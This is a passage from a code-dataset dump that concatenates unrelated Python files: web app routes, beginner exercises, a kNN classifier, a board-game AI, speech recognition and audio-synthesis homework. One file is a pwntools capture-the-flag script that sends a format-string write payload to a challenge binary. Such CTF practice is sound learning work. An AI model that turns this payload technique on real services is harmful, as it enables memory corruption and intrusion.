methods=[\"DELETE\"])\ndef delete_user_repertoire():\n user: User = user_service.get_user()\n body = request.json\n color = body.get(\"color\")\n if not color or color.upper() not in (\"WHITE\", \"BLACK\"):\n raise InvalidRequestException(description=\"Invalid color provided\")\n\n repertoire_service.delete_user_repertoire(user, color.upper() == \"WHITE\")\n return (\n jsonify(\n message=f\"{color} repertoire deleted correctly.\",\n data={},\n success=True,\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"/rival\", methods=[\"PUT\"])\ndef add_rival_move():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n if not args[\"move\"]:\n raise InvalidRequestException(description=\"Please provide a rival move to add\")\n\n moves = repertoire_service.add_rival_move_to_repertoire(\n args[\"position\"], user, args[\"color\"], args[\"move\"]\n )\n\n return (\n jsonify(\n message=f\"Repertoire updated correctly after {args['position'].fen}.\",\n data=len(moves),\n success=True,\n ),\n 201,\n )\n\n\n@repertoire_bp.route(\"/rival\", methods=[\"DELETE\"])\ndef remove_rival_move():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n if not args[\"move\"]:\n raise InvalidRequestException(\n description=\"Please provide a rival move to remove\"\n )\n\n moves = repertoire_service.remove_rival_move_from_repertoire(\n args[\"position\"], user, args[\"color\"], args[\"move\"]\n )\n\n return (\n jsonify(\n message=f\"Move {args['move']} deleted correctly from user repertoire.\",\n data=len(moves),\n success=True,\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"\", methods=[\"PATCH\"])\ndef add_variant_to_repertoire():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n repertoire_service.add_variant_to_repertoire(args[\"position\"], user, args[\"color\"])\n moves = repertoire_service.get_repertoire_moves(\n args[\"position\"], user, args[\"color\"], args[\"depth\"]\n )\n return (\n jsonify(\n message=f\"Variant added correctly after {args['position'].fen}.\",\n data=moves,\n success=True,\n ),\n 200,\n )\n","repo_name":"emanuelbrea/chess-opening-generator","sub_path":"opening_generator/api/api_repertoire.py","file_name":"api_repertoire.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21458244362","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'store'\n\nurlpatterns = [\n path('', views.home, name='home'),\n # path('store/all_product', views.all_products, name='all_products'),\n path('store/', views.search_products, name='search_products'),\n path('store/category//', views.category_products, name='category_products'),\n path('detail//', views.product_detail, name='product_detail'),\n path('update_item/', views.update_item, name='update_item'),\n path('cart/', views.cart, name='cart'),\n path('place_order/', views.place_order, name='place_order'),\n\n]\n","repo_name":"ngocquivo/django-ecom","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72181986728","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nif __name__ == \"__main__\":\r\n s = input().rstrip()\r\n alphabet = [0]*26\r\n for i in s:\r\n alphabet[ord(i)-ord('a')] += 1\r\n \r\n print(' '.join(list(map(str,alphabet))))\r\n","repo_name":"yerim10044001/ProblemSolving","sub_path":"백준/Bronze/10808. 알파벳 개수/알파벳 개수.py","file_name":"알파벳 개수.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73716549287","text":"from unittest import TestCase\nfrom django import VERSION\nfrom .main.models import PizzeriaBar\n\n# under Django 1.11 this fails with\n# django.core.exceptions.FieldError: Local field u'street' in class 'PizzeriaBar' clashes with field of the same name from base class 'Pizzeria'.\n\nclass DocTest(TestCase):\n \n def test_django(self):\n p = PizzeriaBar(name=\"Michaels\", min_age=21, specialty=\"Cheese\",\n pizza_bar_specific_field=\"Doodle\")\n self.assertEqual(p.pizza_bar_specific_field, 'Doodle')\n \n if VERSION[0] == 1 and VERSION[1] == 6:\n self.check_django_16(p)\n elif VERSION[0] == 1 and VERSION[1] > 6:\n self.check_django_17(p)\n else:\n self.fail(\"Unsupported Django version {0}\".format(VERSION))\n\n def check_django_16(self, p):\n \n self.assertEqual(p.name, '')\n\n # The `name` field has not been initialized because\n # it is being inherited from a grand-parent.\n \n def check_django_17(self, p):\n self.assertEqual(p.name, 'Michaels')\n \n \n","repo_name":"lino-framework/book","sub_path":"lino_book/projects/diamond2/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"10396504273","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndatos = pd.read_csv('distancias.txt')\ncabeza = datos.columns.tolist()\nhead=int(cabeza[0])\n\n\n\n\n\nplt.hist(datos, bins=10, edgecolor='black')\ny= datos.max().max()\nplt.xlim(0, y+0.01) # Comienza en 0 y termina en el valor máximo de los datos\n\nprint(datos.max().max())\nplt.xlabel('Valores')\nplt.ylabel('Frecuencia')\nplt.title(f'Histograma de las distancias entre puntos con dimension {head} ')\n\n# Muestra el histograma\nplt.show()","repo_name":"GuSt4v0CCAM4/Laboratorio_01_EDA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70673026728","text":"\"\"\"\n2. create a python file named FlightTicket, and declare the following variables:\n 1. from\n 2. to\n 3. 
ticketPrice\n\n use concatenation to display the full info of the ticket\n\n ex:\n Given Data:\n from = \"Las Vegas\"\n to = \"McLean\"\n ticket_price = 425.5\n\n Output:\n From Las Vegas to McLean is $425.5\n\"\"\"\n\n# Flight ticket information variables\nlocation = \"Las Vegas\"\ndestination = \"McLean\"\nticket_price = 425.5\n\nprint(\"From \" + location + \" to \" + destination + \" is $\" + str(ticket_price))","repo_name":"AishaGench/Pyton_Bootcamp","sub_path":"practice_tasks1/FlightTicket.py","file_name":"FlightTicket.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9363199993","text":"import numpy as np\nimport matplotlib.pyplot as plt\nx = np.linspace(-10, 10, 300)\ny = []\nfor i in x:\n if np.sin(i) > 0: # 调用sin,cos要使用np.sin,np.cos\n y.append(-1)\n else:\n y.append(1)\ny = np.array(y) # 需要把list转化成array,方便进行矩阵的运算\nplt.plot(x, y)\nplt.show()\n","repo_name":"chucklu/PythonTest","sub_path":"2022/chapter9/examples/test-004.py","file_name":"test-004.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32192463407","text":"fruitCalorie = {\n \"Apple\": 130,\n \"Avocado\": 50,\n \"Banana\": 110,\n \"Cantaloupe\": 50,\n \"Grapefruit\": 60,\n \"Grapes\": 90,\n \"Honeydew \": 50,\n \"Kiwifruit\": 90,\n \"Lemon\": 15,\n \"Lime\": 20,\n \"Nectarine\": 60,\n \"Orange\": 80,\n \"Peach\": 60,\n \"Pear\": 100,\n \"Pineapple\": 50,\n \"Plums\": 70,\n \"Strawberries\": 50,\n \"SweetCherries\": 100,\n \"Tangerine\": 50,\n \"Watermelon\": 80\n}\n\n\ndef getcalorie(fruit):\n global fruitCalorie\n if fruit in fruitCalorie:\n print(f\"Calories: {fruitCalorie[fruit]}\")\n\n\nx = input(\"Fruit: \").split(\" \")\nif len(x) > 1:\n fruit = \"\"\n for i in x:\n fruit += i.capitalize()\nelse:\n fruit = \"\".join(x).capitalize()\n\ngetcalorie(fruit)\n\n\n","repo_name":"Kenneth10112/codes","sub_path":"cs50_python/nutrition/nutrition.py","file_name":"nutrition.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26402402429","text":"import copy\nimport random\n\n\nclass TestAI:\n \"\"\"\n A primitive test AI.\n Looks for an optimal move in terms of the shortest distance for self.\n Can not use walls.\n \"\"\"\n\n # Init does not work(\n # def __int__(self, width=9, height=9):\n # print(\"__int__\")\n # from runner import game\n # self.distances = [[0 for _ in range(game.WIDTH)] for _ in range(game.HEIGHT)]\n # print(self.distances)\n\n def move(self, board, pawns_loc, walls, player):\n \"\"\"Return object to be moved and its coordinates.\"\"\"\n from runner import game\n item = \"pawn\"\n # Get all possible moves and choose which of them that is closer to finish\n available_moves = game.available_moves(board, pawns_loc[player])\n distances = self.map_dist(board, player)\n available_moves.sort(key=lambda cell: distances[cell[0]][cell[1]])\n i, j = available_moves[0]\n return item, None, i, j\n\n def map_dist(self, board, player):\n \"\"\"Mapping distances from every cell to the win side of the board.\"\"\"\n from runner import game\n\n # Matrix for distances\n max_value = game.width * game.height\n distances = [[max_value for j in range(game.width)] for i in range(game.height)]\n\n # Add cells with known distances (first/last row) and add them to the frontier\n if player == 1:\n win_side = 0\n elif player == 
2:\n win_side = game.height - 1\n frontier = []\n for j in range(game.width):\n distances[win_side][j] = 0\n frontier.append((win_side, j))\n\n explored = []\n new_frontier = frontier\n while frontier:\n # print(\"frontier: \", frontier)\n # print(\"explored: \", explored)\n frontier = new_frontier\n for cell in frontier.copy():\n i, j = cell[0], cell[1]\n dist = distances[i][j]\n for new_cell in game.available_moves(board, cell, planning=True):\n if new_cell not in frontier and new_cell not in explored:\n i, j = new_cell[0], new_cell[1]\n distances[i][j] = dist + 1\n frontier.append(new_cell)\n explored.append(new_cell)\n frontier.remove(cell)\n explored.append(cell)\n new_frontier = frontier\n\n # print(*distances, sep=\"\\n\", end=\"\\n\")\n # print(type(distances[4][4]))\n return distances\n\n\nclass PrimitiveAI(TestAI):\n \"\"\"\n Looks for an optimal move in terms of the shortest distance (to the finish line)\n with respect to opponent's shortest distance.\n Can use walls.\n \"\"\"\n def move(self, board, pawns_loc, walls, player):\n \"\"\"Return object to be moved and its coordinates.\"\"\"\n print(*board, sep=\"\\n\")\n from runner import game\n if player == 1:\n opponent = 2\n else:\n opponent = 1\n self_i, self_j = pawns_loc[player]\n oppo_i, oppo_j = pawns_loc[opponent]\n rated_moves = []\n available_moves = game.available_moves(board, pawns_loc[player])\n self_distances = self.map_dist(board, player)\n oppo_distances = self.map_dist(board, opponent)\n\n available_moves.sort(key=lambda cell: self_distances[cell[0]][cell[1]])\n i, j = available_moves[0]\n delta = self_distances[i][j] - oppo_distances[oppo_i][oppo_j]\n min_delta = delta\n best_pawn_move = (\"pawn\", (i, j), None, delta)\n rated_moves.append(best_pawn_move)\n\n if not all(wall[\"placed\"] for wall in walls[player]):\n available_walls = game.available_walls(board, pawns_loc, player)\n for wall in available_walls:\n i, j = wall[\"loc\"]\n orientation = wall[\"orientation\"]\n state = copy.deepcopy(board)\n state[i][j][\"wall_origin\"] = True\n state[i][j][\"orientation\"] = orientation\n if orientation == \"horizontal\":\n state[i][j][\"wall_down\"] = True\n state[i][j + 1][\"wall_down\"] = True\n else:\n state[i][j][\"wall_right\"] = True\n state[i + 1][j][\"wall_right\"] = True\n self_dist = self.map_dist(state, player)\n opp_dist = self.map_dist(state, opponent)\n delta = self_dist[self_i][self_j] - opp_dist[oppo_i][oppo_j]\n rated_moves.append((\"wall\", (i, j), orientation, delta))\n if delta < min_delta:\n min_delta = delta\n\n # rated_moves.sort(key=lambda item_loc_rate: item_loc_rate[-1])\n print(rated_moves)\n print(min_delta)\n best_moves = [move for move in rated_moves if move[-1] == min_delta]\n best_move = random.choice(best_moves)\n # best_move = sorted(rated_moves, key=lambda item_loc_rate: item_loc_rate[-1])[0]\n item = best_move[0]\n i, j = best_move[1]\n orientation = best_move[2]\n\n print(*self.map_dist(board, player), sep=\"\\n\", end=\"\\n\")\n\n return item, orientation, i, j\n","repo_name":"YannTyr/Quoridor","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22214303838","text":"'''\nCreated on Sep 16, 2010\nkNN: k Nearest Neighbors\n\nInput: inX: vector to compare to existing dataset (1xN)\n dataSet: size m data set of known vectors (NxM)\n labels: data set labels (1xM vector)\n k: number of neighbors to use for comparison (should be an odd 
number)\n\nOutput: the most popular class label\n\n@author: pbharrin\n'''\n\n'''\n k近值算法示例\n'''\nimport matplotlib.pyplot as plt\nimport operator\n\nfrom numpy import *\nfrom numpy.ma.core import *\n\n'''\n使用k近邻算法改进约会网站的配对效果,算法步骤如下:\n(1) 收集数据:提供文本文件。\n(2) 准备数据:使用Python解析文本文件。\n(3) 分析数据:使用Matplotlib画二维扩散图。\n(4) 训练算法:此步骤不适用于k-近邻算法。\n(5) 测试算法:使用海伦提供的部分数据作为测试样本。测试样本和非测试样本的区别在于:测试样本是已经完成分类的数据,如果预测分类与实际类别不同,则标记为一个错误。\n(6) 使用算法:产生简单的命令行程序,然后海伦可以输入一些特征数据以判断对方是否为自己喜欢的类型。\n'''\n\n\ndef dating_class_test():\n hoRatio = 0.50 # hold out 10%\n # 从指定文件中载入数据,载入数据为每年获得的飞行常客里程数,玩视频游戏所耗时间百分比,每周消费的冰淇淋升数\n datingDataMat, datingLabels = file2matrix('datingTestSet2.txt')\n normMat, ranges, minVals = autoNorm(datingDataMat)\n # print(normMat[0:20])\n # print(ranges)\n # print(minVals)\n # exit()\n\n m = normMat.shape[0] # 取矩阵行数,rage函数返回包含行列数的元组对象\n numTestVecs = int(m * hoRatio) # 取测试行数\n errorCount = 0.0\n for i in range(numTestVecs):\n # 取出矩阵每一行,非测试行,非测试行的分类标签\n classifierResult = classify0(normMat[i, :], normMat[numTestVecs:m, :], datingLabels[numTestVecs:m], 3) # 求预测分类值\n print(\"the classifier came back with: %d, the real answer is: %d\" % (classifierResult, datingLabels[i]))\n if (classifierResult != datingLabels[i]): errorCount += 1.0 # 预测分类与实际类别不同,则标记为一个错误\n print(\"the total error rate is: %f, error count is %d\" % (errorCount / float(numTestVecs), errorCount))\n\n\n# 分类器方法,求预测分类值\ndef classify0(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0] # 行数\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet # 求出测试样本与非测试样本的差值\n sqDiffMat = diffMat ** 2 # 求方\n sqDistances = sqDiffMat.sum(axis=1) # 行求和\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n\n classCount = {}\n\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef createDataSet():\n group = array([[1.0, 1.1], [1.0, 1.0], [0, 0], [0, 0.1]])\n labels = ['A', 'A', 'B', 'B']\n return group, labels\n\n\n# 将文本文件转换为NumPy矩阵\n# Input: 文本��件路径\n# Output: 包含训练样本数据的NumPy矩阵和类标签向量\ndef file2matrix(filename):\n fr = open(filename)\n numberOfLines = len(fr.readlines()) # 得到文件行数\n returnMat = zeros((numberOfLines, 3)) # 创建Numpy矩阵并初始化0\n classLabelVector = [] # 初始化分类标签向量,存放文本行中最后一列分类标签\n fr = open(filename)\n index = 0\n for line in fr.readlines():\n line = line.strip() # 去除回车符\n listFromLine = line.split('\\t')\n returnMat[index, :] = listFromLine[0:3] # 给矩阵填值\n classLabelVector.append(int(listFromLine[-1])) # 取出最后一个字段作为标签值存入向量对象\n index += 1\n return returnMat, classLabelVector\n\n\n# 归一化特征值,即将飞行公里数值转化为[0,1]区间值\n# newValue = (oldValue-min)/(max-min)\n# dataset: NumPy矩阵\n# 返回值:归一化的numPy矩阵, 最大最小飞行公里数的差值行, 最小矩阵行\ndef autoNorm(dataSet):\n minVals = dataSet.min(0)\n maxVals = dataSet.max(0)\n ranges = maxVals - minVals # 取最大最小飞行公里数的差值\n normDataSet = zeros(shape(dataSet))\n m = dataSet.shape[0]\n normDataSet = dataSet - tile(minVals, (m, 1)) # 矩阵每一行都与最小矩阵行做差值运算\n normDataSet = normDataSet / tile(ranges, (m, 1)) # element wise divide,上一步计算出的矩阵每一行去除最大最小插值矩阵\n return normDataSet, ranges, minVals\n\n\n\n\n# 读取NumPy矩阵格式的特征值,显示为散列图\ndef test1():\n datingDataMat, datingLabels = file2matrix('datingTestSet2.txt')\n print(datingDataMat[0:20])\n print(datingLabels[0:20])\n fig = plt.figure()\n ax = fig.add_subplot(111)\n # ax.scatter(datingDataMat[:, 1], datingDataMat[:, 2], 15.0 * array(datingLabels), 15.0 * array(datingLabels)) # 
玩视频游戏所占百分比,每周消耗的冰淇淋升数\n # plt.show()\n ax.scatter(datingDataMat[:, 0], datingDataMat[:, 1], 15.0 * array(datingLabels), 15.0 * array(datingLabels)) # 玩视频游戏所占百分比,每周消耗的冰淇淋升数\n plt.show()\n\ndef test2():\n datingDataMat, datingLabels = file2matrix('datingTestSet2.txt')\n normMat, ranges, minVals = autoNorm(datingDataMat)\n print(normMat)\n print(minVals)\n print(ranges)\n print(normMat.shape)\n\n\n# print(\"========================================================\")\n# test1()\n# print(\"========================================================\")\n# test2()\n\ndating_class_test()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"uncarman2017/MLBeginner","sub_path":"Ch02/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33190372707","text":"import os\nfrom glob import glob\n\n__all__ = ['doc_inherit']\n\n\ndef doc_inherit(base_class, base_method=None):\n \"\"\"\n Docstring inheriting method descriptor.\n\n doc_inherit decorator\n\n Usage:\n\n .. code-block:: python\n\n class Foo(object):\n def foo(self):\n \"Frobber\"\n pass\n\n class Bar(Foo):\n @doc_inherit(Foo)\n def foo(self):\n pass\n\n Now, ``Bar.foo.__doc__ == Bar().foo.__doc__ == Foo.foo.__doc__ ==\n \"Frobber\"``\n \"\"\"\n\n def decorator(method):\n \"\"\"Overwrite method docstring.\"\"\"\n # check whether the method exists\n if base_method is None:\n overridden = getattr(base_class, method.__name__, None)\n else:\n overridden = getattr(base_class, base_method, None)\n if overridden is None:\n raise AttributeError('Can\\'t find method \\'%s\\' in base class.')\n # change docstring\n method.__doc__ = overridden.__doc__\n return method\n\n return decorator\n","repo_name":"theochem/chemtools","sub_path":"chemtools/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"32806213742","text":"from pwn import *\nBINARY = ['./chall']\nIP, PORT = 'ctf99.cs.ui.ac.id', 10009\nLOCAL = True\nDEBUG = False\nif LOCAL:\n if DEBUG:\n p = gdb.debug(BINARY, '''\n b *main+110\n b *main+132\n b *main+148\n ''')\n else:\n p = process(BINARY)\nelse:\n p = remote(IP, PORT)\nif not LOCAL:\n print(p.recv()) # Weird behaviour from the server\ntarget = \"we dont know dumbass\"\npayload = b'%1337x%9$n'\n# payload = b'A'*11 + b'%6$p'\nprint(f\"Payload length is: {len(payload)}\")\nprint(p.recv())\np.sendline(payload)\nprint(p.recvline().decode())\nprint(p.recvline())\np.close()\n","repo_name":"valordra/ctf99_tools","sub_path":"Week 4/format-string-hard/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7044780454","text":"from transformers import pipeline\r\nimport librosa\r\nimport torch\r\n\r\ndevice = 'cuda:0' if torch.cuda.is_available() else 'cpu'\r\n\r\n# load model and processor\r\nmodel_name = \"openai/whisper-small\"\r\npipe = pipeline(\r\n \"automatic-speech-recognition\",\r\n model=model_name,\r\n chunk_length_s=30,\r\n device=device,\r\n max_new_tokens=448,\r\n)\r\n\r\ndef recognize(filepath=\"output.wav\"):\r\n speech_array, sampling_rate = librosa.load(filepath, sr=16_000)\r\n prediction = pipe(speech_array)[\"text\"]\r\n return prediction\r\n # we can also return timestamps for the predictions\r\n # prediction = pipe(speech_array, 
return_timestamps=True)[\"chunks\"]\r\n # print(prediction)\r\n\r\nif __name__ == \"__main__\":\r\n print(\"recognizing...\")\r\n print(recognize())","repo_name":"rnishiura/speech-chatgpt","sub_path":"recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42732566662","text":"# -*- coding: utf-8 -*-#\r\n# -------------------------------------------------------------------------------\r\n# Name: C5_W3_HomeWork_Part2\r\n# Description: 本作业完成了语音关键字触发检测系统的构建\r\n# 1. 前一大部分都是关于输入数据的处理\r\n# 一般处理声音数据,都是固定采样序列,将例如10s的输入分割为多少份,然后每一份的44100频率表示了声音的特征\r\n# 然后根据这个特征进行滑动窗口转换来计算频谱图,因此着这份作业中,输入的音频数据\r\n# 在时间长度上 从10s 采样为Tx = 5511\r\n# 声音的特征 从44100 通过傅里叶频谱变换 转换为 101个频率的声音上来\r\n# 因此输入的X = (batchsize , 5511, 101)\r\n# 然后经过一系列的随机插入,overlap检测,标签更新,我们能够人工合成满足题意的数据集\r\n# 2. 在完成数据集处理之后,我们通过构建模型,模型结构参看Model.png,然后导入已经训练好的h5参数,\r\n# 最终完成了关键字检测\r\n# Author: Administrator\r\n# Date: 2021/1/15\r\n# Last Modified data: 2021年1月19日\r\n# -------------------------------------------------------------------------------\r\n# 导入必要环境\r\nimport numpy as np\r\nfrom pydub import AudioSegment\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport sys\r\nimport io\r\nimport os\r\nimport glob\r\nimport IPython\r\nfrom C5_W3_HomeWork_Part2_DataSet.td_utils import *\r\n\r\n# 试听一些数据集音频\r\n# \"activate\"目录包含人们说\"activate\"一词的正面示例。\r\n# \"negatives\"目录包含人们说\"activate\"以外的随机单词的否定示例。每个音频记录只有一个字。\r\n# \"backgrounds\"目录包含10秒的不同环境下的背景噪音片段。\r\n# 由于pycharm相关的支持工作并不完善,在pycharm中无法听取,但是在Jupyterbook中是可以的\r\n\r\nIPython.display.Audio(r\"C5_W3_HomeWork_Part2_DataSet/raw_data/activates/1.wav\")\r\nIPython.display.Audio(r\"C5_W3_HomeWork_Part2_DataSet/raw_data/activates/1.wav\")\r\nIPython.display.Audio(r\"C5_W3_HomeWork_Part2_DataSet/raw_data/backgrounds/1.wav\")\r\n\r\n# 从录音到频谱图\r\n# 从音频的这种“原始”表示中很难弄清是否说了\"activate\"这个词。\r\n# 为了帮助你的序列模型更轻松地学习检测触发词,我们将计算音频的spectrogram。\r\n# 频谱图告诉我们音频片段在某个时刻存在多少不同的频率。\r\n\r\n# 将音频文件切换为数据\r\nx = graph_spectrogram(r\"C5_W3_HomeWork_Part2_DataSet/audio_examples/example_train.wav\")\r\n_, data = wavfile.read(r\"C5_W3_HomeWork_Part2_DataSet/audio_examples/example_train.wav\")\r\n# print(\"Time steps in audio recording before spectrogram\", data[:,0].shape)\r\n# print(\"Time steps in input after spectrogram\", x.shape)\r\n# Time steps in audio recording before spectrogram (441000,)\r\n# Time steps in input after spectrogram (101, 5511)\r\n# 通过以上输出,我们可以得出,整个转换后频谱图为5511个时间单元,每个时间单元一共有101中可能输出\r\n# 对应之前的单词模型,Tx = 5511, MAX_SENTENCE_LENGTH = 101\r\n\r\n# 定义超参数 为全局变量\r\nTx = 5511\r\nn_freq = 101\r\nTy = 1375\r\n\r\n# 合成单个训练示例\r\n# 由于语音数据很难获取和标记,因此你将使用激活,否定和背景的音频片段来合成训练数据。\r\n# 录制很多带有随机\"activates\"内容的10秒音频剪辑非常慢。取而代之的是,\r\n# 录制许多肯定词和否定词以及分别记录背景噪音(或从免费的在线资源下载背景噪音)会变得更加容易。\r\n\r\nactivates, negatives, backgrounds = load_raw_audio()\r\n# print(\"background len: \" + str(len(backgrounds[0])))\r\n# # Should be 10,000, since it is a 10 sec clip\r\n# print(\"activate[0] len: \" + str(len(activates[0])))\r\n# # Maybe around 1000, since an \"activate\" audio clip is usually around 1 sec (but varies a lot)\r\n# print(\"activate[1] len: \" + str(len(activates[1])))\r\n# # Different \"activate\" clips can have different lengths\r\n\r\n# 完成上一步之后,你就获得了所有在原始数据中存储的active,positive和背景数据\r\n# 下面如何进行覆盖,也就是在背景中的某一段,覆盖为active,positive相关的音频,但是依然要保证最终的输出时间为10s\r\n# 当插入或覆盖\"activate\"剪辑时,还将更新yt的标签,以便输出的该时刻之后的50个步骤标记为具有\r\n# 目标标签1。你将训练GRU来检测何时某人完成说\"activate\"。例如,假设合成的\"activate\"剪辑在\r\n# 
10秒音频中的5秒标记处结束(恰好在剪辑的一半处)。回想一下 ,由于设定超参数Ty = 1375,\r\n# 因此时间步长 687 = 1375 * 0.5 对应音频的5秒时刻,此时你将设置 Y688 = 1,实际上考虑\r\n# 到实际中的应用,10s的1375份中的一份标记为1实在是过于短暂,因此实际操作中\r\n# 我们将标签之后的50个连续值设置为1。我们有。y688 = y689 = y690 = …… = y737 = 1\r\n\r\n# 要实现合成训练集过程,你将使用以下帮助函数。所有这些函数将使用1ms的离散时间间隔,\r\n# 因此将10秒的音频离散化为10,000步。\r\n\r\n# 函数 get_random_time_segment(segment_ms)返回一个随机的时间段,\r\n# 我们可以在其中插入持续时间为segment_ms的音频片段。 通读代码以确保你了解它在做什么。\r\ndef get_random_time_segment(segment_ms):\r\n \"\"\"\r\n Gets a random time segment of duration segment_ms in a 10,000 ms audio clip.\r\n\r\n Arguments:\r\n segment_ms -- the duration of the audio clip in ms (\"ms\" stands for \"milliseconds\")\r\n\r\n Returns:\r\n segment_time -- a tuple of (segment_start, segment_end) in ms\r\n \"\"\"\r\n\r\n segment_start = np.random.randint(low=0, high=10000 - segment_ms) # Make sure segment doesn't run past the 10sec background\r\n segment_end = segment_start + segment_ms - 1\r\n\r\n return (segment_start, segment_end)\r\n\r\n# 接下来,假设你在(1000,1800)和(3400,4500)段插入了音频剪辑。\r\n# 即第一个片段开始于1000步,结束于1800步。\r\n# 现在,如果我们考虑在(3000,3600)插入新的音频剪辑,这是否与先前插入的片段之一重叠?\r\n# 在这种情况下,(3000,3600)和(3400,4500)重叠,因此我们应该决定不要在此处插入片段。\r\n\r\n# 出于此函数的目的,将(100,200)和(200,250)定义为重叠,因为它们在时间步200处重叠。\r\n# 但是,(100,199)和(200,250)是不重叠的。\r\n\r\n# 实现is_overlapping(segment_time,existing_segments)\r\n# 来检查新的时间段是否与之前的任何时间段重叠。你需要执行2个步骤:\r\n# 1. 创建一个“False”标志,如果发现有重叠,以后将其设置为“True”。\r\n# 2. 循环遍历previous_segments的开始和结束时间。\r\n# 将这些时间与细分的开始时间和结束时间进行比较。4\r\n# 如果存在重叠,请将(1)中定义的标志设置为True。\r\n\r\ndef is_overlapping(segment_time, previous_segments):\r\n \"\"\"\r\n Checks if the time of a segment overlaps with the times of existing segments.\r\n\r\n Arguments:\r\n segment_time -- a tuple of (segment_start, segment_end) for the new segment\r\n previous_segments -- a list of tuples of (segment_start, segment_end) for the existing segments\r\n\r\n Returns:\r\n True if the time segment overlaps with any of the existing segments, False otherwise\r\n \"\"\"\r\n\r\n for elements in previous_segments:\r\n if(elements[1] >= segment_time[0] and elements[0] <= segment_time[0]) or (elements[1] >= segment_time[1] and elements[0] <= segment_time[1]):\r\n break\r\n else:\r\n return False\r\n return True\r\n\r\n# Test OK!\r\n# overlap1 = is_overlapping((950, 1430), [(2000, 2550), (260, 949)])\r\n# overlap2 = is_overlapping((2305, 2950), [(824, 1532), (1900, 2305), (3424, 3656)])\r\n# print(\"Overlap 1 = \", overlap1)\r\n# print(\"Overlap 2 = \", overlap2)\r\n\r\n# 现在,让我们使用以前的辅助函数在10秒钟的随机时间将新的音频片段插入到背景中,\r\n# 但是要确保任何新插入的片段都不会与之前的片段重叠。\r\n\r\n# 练习:实现insert_audio_clip()以将音频片段叠加到背景10秒片段上。你将需要执行4个步骤:\r\n#\r\n# 1. 以ms为单位获取正确持续时间的随机时间段。\r\n# 2. 确保该时间段与之前的任何时间段均不重叠。如果重叠,则返回步骤1并选择一个新的时间段。\r\n# 3. 将新时间段添加到现有时间段列表中,以便跟踪你插入的所有时间段。\r\n# 4. 
使用pydub在背景上覆盖音频片段。我��已经为你实现了这一点。\r\n\r\n\r\ndef insert_audio_clip(background, audio_clip, previous_segments):\r\n \"\"\"\r\n Insert a new audio segment over the background noise at a random time step, ensuring that the\r\n audio segment does not overlap with existing segments.\r\n\r\n Arguments:\r\n background -- a 10 second background audio recording.\r\n audio_clip -- the audio clip to be inserted/overlaid.\r\n previous_segments -- times where audio segments have already been placed\r\n\r\n Returns:\r\n new_background -- the updated background audio\r\n \"\"\"\r\n segment_ms = len(audio_clip)\r\n # 获取要插入的audio_clip长度\r\n\r\n segment_time = get_random_time_segment(segment_ms)\r\n # 随机得到一个能够插入上述segment_ms的元组 分别代表插入的起始位置\r\n\r\n # 不断随机,知道找到能够插入其中,而且不会覆盖的区间\r\n while(is_overlapping(segment_time,previous_segments)):\r\n segment_time = get_random_time_segment(segment_ms)\r\n\r\n # 将新插入的区间更新进入previous_segments 方便后续调用\r\n previous_segments.append(segment_time)\r\n\r\n # 将audio_clip插入到指定开始位置\r\n new_background = background.overlay(audio_clip,position = segment_time[0])\r\n\r\n return new_background,segment_time\r\n\r\n# Test OK!\r\n# np.random.seed(5)\r\n# audio_clip, segment_time = insert_audio_clip(backgrounds[0], activates[0], [(3790, 4400)])\r\n# print(\"Segment Time: \", segment_time)\r\n\r\n# 最后,假设你刚刚插入了\"activate.\" ,则执行代码以更新标签yt。\r\n# 在下面的代码中,由于Ty = 